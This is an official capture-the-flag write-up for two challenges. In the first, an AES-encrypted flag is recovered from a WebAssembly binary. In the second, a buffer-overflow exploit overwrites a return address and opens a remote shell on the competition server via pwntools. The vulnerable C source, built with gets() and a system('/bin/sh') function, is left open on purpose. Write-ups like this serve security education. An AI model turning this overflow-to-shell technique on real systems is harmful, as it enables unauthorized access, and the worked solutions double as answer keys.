NHNC official writeUP

b@by_r3v3rs3

difficulty 2/10

as the question we can get a web assembling file when we download it as we need do disassemble the web assembling to c we can use
a tool call wabt
and how to use it just do

1
wasm2c b@by_r3v3rs3.wasm -o main.c

and we can get a c file
as seeing the code we know it is AES and also can know the key has been xor

1
2
3
4
5
6
7
8
9
static const u8 data_segment_data_w2c_challenge_d1[] = {
  0x29, 0x3f, 0x39, 0x28, 0x3f, 0x2e, 0x31, 0x3f, 0x23, 0x65, 0x65, 0x65, 
  0x7b, 0x7b, 0x7b, 0x24, 0x48, 0x69, 0x5f, 0x49, 0x5f, 0x61, 0x6d, 0x5f, 
  0x69, 0x76, 0x5f, 0x6f, 0x77, 0x6f, 0x21, 0x21, 0x06, 0x46, 0x88, 0x88, 
  0x22, 0xbb, 0x1d, 0x1d, 0x9d, 0xd4, 0x54, 0x36, 0x4d, 0xc1, 0xef, 0x42, 
  0xf9, 0xeb, 0xd2, 0xd8, 0xd4, 0x93, 0x13, 0xc3, 0x40, 0x77, 0x72, 0x88, 
  0xe2, 0xea, 0x49, 0x47, 0x91, 0x3f, 0xe5, 0x9f, 0x3c, 0x53, 0x5d, 0xd2, 
  0x7b, 0xbc, 0x26, 0xec, 0xc3, 0x29, 0xa9, 0x10, 
};

we know how to write an exploit

so mine official exploit is

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
from Crypto.Cipher import AES

key = [
    0x29, 0x3f, 0x39, 0x28, 
    0x3f, 0x2e, 0x31, 0x3f, 
    0x23, 0x65, 0x65, 0x65, 
    0x7b, 0x7b, 0x7b, 0x24, 
]

iv = [
    0x48, 0x69, 0x5f, 0x49, 
    0x5f, 0x61, 0x6d, 0x5f, 
    0x69, 0x76, 0x5f, 0x6f, 
    0x77, 0x6f, 0x21, 0x21, 
]
cipher = [
    0x06, 0x46, 0x88, 0x88, 0x22, 0xbb, 0x1d, 
    0x1d, 0x9d, 0xd4, 0x54, 0x36, 0x4d, 0xc1, 
    0xef, 0x42, 0xf9, 0xeb, 0xd2, 0xd8, 0xd4, 
    0x93, 0x13, 0xc3, 0x40, 0x77, 0x72, 0x88, 
    0xe2, 0xea, 0x49, 0x47, 0x91, 0x3f, 0xe5, 
    0x9f, 0x3c, 0x53, 0x5d, 0xd2, 0x7b, 0xbc, 
    0x26, 0xec, 0xc3, 0x29, 0xa9, 0x10,
]

key = bytes(key)
iv = bytes(iv)
cipher = bytes(cipher)

key = xor(key, 0x5A)

def decrypt_aes_cbc(ciphertext: bytes, key: bytes, iv: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(ciphertext)
    return decrypted


flag = decrypt_aes_cbc(cipher, key, iv)

print("Decrypted flag:", flag.rstrip(b'\x00').decode(errors="ignore"))

clannad_is_g00d_anim3

difficulty 3/10

at first see the source

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

char *gets(char *s);

int Clannad(){
  system("/bin/sh");
}

int vuln(){
  char buffer[64];
  printf("Welcome to the world of dango daikazoku\n");
  printf("enter a dango:");
  gets(buffer);
}

int main(){
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stderr, 0, 2, 0);

  vuln();
  printf("Hello\n");
  return 0;
}

as we can see the code has use a things call gets()so we can do buffer overflow. Note that the stack needs to be aligned to a 16-byte boundary because of the calling convention of x86_64.
As we put it into the debugger you can find out you can just use the address 0x4011bb
image

final exploit:

1
2
3
4
5
6
7
8
9
10
from pwn import *

#r = process("./chall")
r = remote("chal.78727867.xyz", 9999)

r.recvline()
r.recvuntil(b":")
r.sendline(b"a"*72 + p64(0x4011bb))

r.interactive()